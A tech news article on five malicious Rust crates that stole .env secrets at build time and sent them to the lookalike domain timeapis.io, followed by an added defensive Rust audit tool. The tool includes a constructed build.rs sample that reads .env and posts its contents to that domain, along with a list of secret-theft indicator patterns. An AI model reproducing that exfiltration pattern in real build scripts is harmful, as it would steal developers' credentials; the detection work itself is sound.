
Five Malicious Rust Crates Discovered Stealing Developer Secrets from CI/CD Pipelines

Security researchers at Socket have uncovered a coordinated supply chain attack in the Rust ecosystem, where five malicious crates disguised as time utilities were exfiltrating .env files and credentials from developer environments. The campaign used a lookalike domain impersonating a legitimate time API service, highlighting growing threats to software supply chains.


TechDrop Editorial


Security researchers at Socket have uncovered a coordinated supply chain attack targeting the Rust ecosystem, where five malicious crates published to the official crates.io registry were silently exfiltrating developer secrets from build environments. The crates — chrono_anchor, dnp3times, time_calibrator, time_calibrators, and time-sync — were disguised as time synchronization utilities but contained code designed to steal .env files, API keys, database credentials, and cloud access tokens.

How the Attack Worked

All five crates shared identical exfiltration logic, suggesting a single actor behind the campaign. Cargo compiles and runs dependency code on the developer's machine during the build (build scripts and procedural macros execute before the application itself does), so a dependency can read files and open connections before anyone runs the resulting binary. When included as a dependency, these crates ran during the build process, scanning the developer's environment for .env files and other configuration files containing secrets. The stolen data was sent to timeapis.io, a lookalike domain chosen to impersonate the legitimate timeapi.io service and differing from it by a single letter.

The attack was particularly insidious because it targeted build environments rather than runtime. Many developers review what their application does at runtime more carefully than what its dependencies do at compile time, and the disguise reinforced that blind spot: a time synchronization utility has a plausible reason to contact a time API, so an outbound request to a host that looks like timeapi.io is exactly the kind of traffic a code reviewer or an egress log would wave through. The lookalike domain turned the crates' cover story into cover for the exfiltration.

Detection and Response

Socket's Threat Research Team discovered the malicious crates through automated analysis of newly published packages on crates.io. Four of the five crates were yanked from the registry quickly, but chrono_anchor persisted longer because it used additional obfuscation: string encryption and delayed execution hid its true behavior from static analysis tools, so the literal indicators visible in the other four crates were not present in its source.

The crates were published between late February and early March 2026, and while download counts were relatively low, the targeted nature of the attack — focused on developer environments where secrets are most concentrated — means that even a small number of compromised developers could provide attackers with access to production infrastructure.

Broader Implications

The incident highlights a growing trend in supply chain attacks: targeting developer toolchains rather than production systems. A single compromised developer laptop can yield credentials for dozens of production services, cloud accounts, and internal systems. The Rust ecosystem, while generally well-regarded for security, faces the same dependency trust challenges as npm, PyPI, and other package registries.

Socket recommends that affected developers immediately rotate all exposed credentials, audit their CI/CD pipeline dependencies, and restrict outbound network access from build environments to prevent future exfiltration. Rotation should cover everything that was present in the .env files on any affected machine (API keys, database credentials, cloud tokens), not only the secrets that can be seen in a log. On the network restriction, note that Cargo's own `--offline` and `--frozen` flags only stop Cargo from fetching crates; they do nothing to stop a build script or procedural macro from opening its own socket, so the egress restriction has to be enforced by the environment (a network namespace, a container with networking disabled, or an allow-list firewall), and a build that is not supposed to need the network should fail loudly when it tries to use one.
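The following is an added example, not code from Socket's report or from TechDrop, showing a first-pass check a team could run on a repository after reading this report. It serves both the dependency audit recommended here and the indicators described under "How the Attack Worked": it parses a Cargo.lock for the five crate names listed above and scans vendored source text (a build.rs, say) for the lookalike domain, reads of .env, and outbound networking in a crate that should not need it. The Cargo.lock and build script below are constructed samples (the "0.1.2" version is made up); the HTTP-client and socket patterns are assumptions about what such code would typically use, not details from the report; and the line-based Cargo.lock parser is a simplification that assumes Cargo's standard formatting, where a real audit should use `cargo metadata` output or a TOML parser.

```rust
// Added example (not from Socket's report or TechDrop): first-pass indicator
// check for a Rust project after the crates.io campaign described above.
use std::collections::HashSet;

/// Crate names the article identifies as malicious.
pub const MALICIOUS_CRATES: [&str; 5] = [
    "chrono_anchor",
    "dnp3times",
    "time_calibrator",
    "time_calibrators",
    "time-sync",
];

/// Line-based parser for Cargo.lock, returning (name, version) for every
/// [[package]] table. Assumption: standard cargo-generated formatting
/// (`name = "..."` and `version = "..."` on their own lines).
pub fn parse_cargo_lock(lock: &str) -> Vec<(String, String)> {
    let mut packages = Vec::new();
    let mut name: Option<String> = None;
    let mut version: Option<String> = None;
    for line in lock.lines().map(str::trim) {
        if line == "[[package]]" {
            // Close the previous table if both fields were seen; the top-level
            // `version = N` line before the first table is discarded here.
            if let (Some(n), Some(v)) = (name.take(), version.take()) {
                packages.push((n, v));
            }
        } else if let Some(rest) = line.strip_prefix("name = ") {
            name = Some(rest.trim_matches('"').to_string());
        } else if let Some(rest) = line.strip_prefix("version = ") {
            version = Some(rest.trim_matches('"').to_string());
        }
    }
    if let (Some(n), Some(v)) = (name, version) {
        packages.push((n, v));
    }
    packages
}

/// Locked packages whose name matches a known malicious crate, as "name version".
pub fn flag_malicious(packages: &[(String, String)]) -> Vec<String> {
    let bad: HashSet<&str> = MALICIOUS_CRATES.iter().copied().collect();
    packages
        .iter()
        .filter(|(n, _)| bad.contains(n.as_str()))
        .map(|(n, v)| format!("{} {}", n, v))
        .collect()
}

/// Indicators for vendored source. The domain and the .env read come from the
/// report; the networking patterns are assumptions about typical implementations.
const INDICATORS: [(&str, &str); 6] = [
    ("timeapis.io", "lookalike exfiltration domain"),
    (".env", "reads a dotenv-style secret file"),
    ("std::net::TcpStream", "raw outbound socket"),
    ("reqwest::", "HTTP client (reqwest)"),
    ("ureq::", "HTTP client (ureq)"),
    ("std::env::vars", "enumerates environment variables"),
];

/// Scan source text line by line; returns "line N: pattern (reason)" per hit.
/// Literal matching only: it cannot see strings a crate stores encrypted.
pub fn scan_source(src: &str) -> Vec<String> {
    let mut hits = Vec::new();
    for (idx, line) in src.lines().enumerate() {
        for &(pat, why) in INDICATORS.iter() {
            if line.contains(pat) {
                hits.push(format!("line {}: {} ({})", idx + 1, pat, why));
            }
        }
    }
    hits
}

/// Constructed Cargo.lock sample (not a real lockfile; versions are made up).
pub const SAMPLE_LOCK: &str = r#"
version = 3

[[package]]
name = "chrono"
version = "0.4.38"

[[package]]
name = "time-sync"
version = "0.1.2"

[[package]]
name = "myapp"
version = "0.1.0"
dependencies = [
 "chrono",
 "time-sync",
]
"#;

/// Constructed build-script text illustrating the pattern the report describes
/// (not code from any of the five crates).
pub const SAMPLE_BUILD_RS: &str = r#"
use std::fs;
fn main() {
    let secrets = fs::read_to_string(".env").unwrap_or_default();
    let _ = ureq::post("https://timeapis.io/sync").send_string(&secrets);
}
"#;

fn main() {
    for f in flag_malicious(&parse_cargo_lock(SAMPLE_LOCK)) {
        println!("MALICIOUS DEPENDENCY: {}", f);
    }
    for h in scan_source(SAMPLE_BUILD_RS) {
        println!("INDICATOR: {}", h);
    }
}
```

Run it with `cargo run` in a throwaway binary crate, or paste the functions into an existing audit tool; `cargo vendor` produces the source tree to feed to scan_source. Absence of hits is not a clean bill of health: chrono_anchor was noted above for encrypting its strings, so a literal match on the domain would not fire against it, and the crate list is only the five names Socket has published.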
